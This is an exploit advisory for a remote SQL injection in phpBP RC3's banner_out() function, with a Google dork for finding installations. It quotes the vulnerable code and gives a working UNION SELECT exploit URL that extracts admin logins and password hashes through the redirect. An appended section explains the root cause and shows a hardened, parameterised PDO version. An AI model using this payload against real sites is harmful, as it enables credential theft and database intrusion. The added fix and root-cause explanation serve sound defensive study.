
phpBP <= RC3 (2.204) FIX4 Remote SQL Injection Vulnerability


.-----------------------------------------------------------------------------.
| vuln.: phpBP <= RC3 (2.204) FIX4 Remote SQL Injection Vulnerability |
| download: http://www.phpbp.com/ |
| dork: "PHP BP Team" |
| |
| author: irk4z@yahoo.pl |
| homepage: http://irk4z.wordpress.com/ |
| |
| - HACKBOX.pl <--- |
| |
| greets to: cOndemned, str0ke, wacky |
'-----------------------------------------------------------------------------'

# code:

./includes/functions/banners-external.php:
...
function banner_out() // counts the number of clicks on the banner
{
    global $conf;

    if($_GET['id'])
    {
        // validation is applied to $_POST['id'], but the queries below use $_GET['id']
        SQLvalidate($_POST['id']);

        $db = new dbquery;
        // $_GET[id] is interpolated unquoted into the SELECT
        $db->query("SELECT * FROM $conf[prefix]banners WHERE id=$_GET[id]") or $db->err(__FILE__, __LINE__);

        if($db->num_rows()==0)
        {
            redirect('index.php?module=error?error=banners_error2');
            exit;
        }

        $d=$db->fetch_object();
        $db->query("UPDATE $conf[prefix]banners SET views=views+1 WHERE id='$_GET[id]'") or $db->err(__FILE__, __LINE__);

        // the redirect target is the url column of the row returned by the SELECT
        redirect($d->url);
    }

    exit;
}
...

# exploit:

http://[host]/[path]/index.php?function=banner_out&id=10000/**/LIMIT/**/0/**/UNION/**/SELECT/**/1,2,concat(0x687474703A2F2F,login,0x5F,pass),4,5,6,7,8,9/**/FROM/**/phpbp_users/**/LIMIT/**/1/*

You will be redirected to http://[login]_[md5_hash_pass] (e.g. http://admin_21232f297a57a5a743894a0e4a801fc3/)

[2008-03-16]
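
# hardened form (added example):

The root cause in the listing above is that SQLvalidate() is applied to $_POST['id'] while both queries use $_GET['id'], which is placed unquoted into the SELECT. The block below is an added example of a corrected lookup, not phpBP code and not from the advisory author; it assumes PDO with an in-memory SQLite table in place of phpBP's dbquery class, and the function names and the sample row are hypothetical.

```php
<?php
// Added example, not phpBP code. PDO with in-memory SQLite is an assumption
// standing in for phpBP's dbquery class; function names are hypothetical.

// Accept only a plain positive decimal id, read from the same source
// ($_GET) that the queries use.
function banner_id_from_request(array $get): ?int
{
    $raw = $get['id'] ?? null;
    if (!is_string($raw) || preg_match('/\A[1-9][0-9]{0,8}\z/', $raw) !== 1) {
        return null;
    }
    return (int) $raw;
}

// Look up the banner URL and count the click. The id is bound as a
// parameter; $prefix comes from site configuration, never from the request.
function banner_out_hardened(PDO $pdo, string $prefix, array $get): ?string
{
    $id = banner_id_from_request($get);
    if ($id === null) {
        return null;
    }
    $sel = $pdo->prepare("SELECT url FROM {$prefix}banners WHERE id = :id");
    $sel->execute([':id' => $id]);
    $url = $sel->fetchColumn();
    if (!is_string($url)) {
        return null;   // no such banner
    }
    $upd = $pdo->prepare("UPDATE {$prefix}banners SET views = views + 1 WHERE id = :id");
    $upd->execute([':id' => $id]);
    return $url;
}

// Constructed sample data.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE phpbp_banners (id INTEGER PRIMARY KEY, url TEXT, views INTEGER DEFAULT 0)");
$pdo->exec("INSERT INTO phpbp_banners (id, url) VALUES (1, 'http://example.com/')");

var_dump(banner_out_hardened($pdo, 'phpbp_', ['id' => '1']));                    // valid id
var_dump(banner_out_hardened($pdo, 'phpbp_', ['id' => '10000/**/LIMIT/**/0']));  // rejected before any query
var_dump($pdo->query("SELECT views FROM phpbp_banners WHERE id = 1")->fetchColumn());
```

The caller issues the redirect only when the function returns a string, so a rejected id never reaches the database and never influences the redirect target.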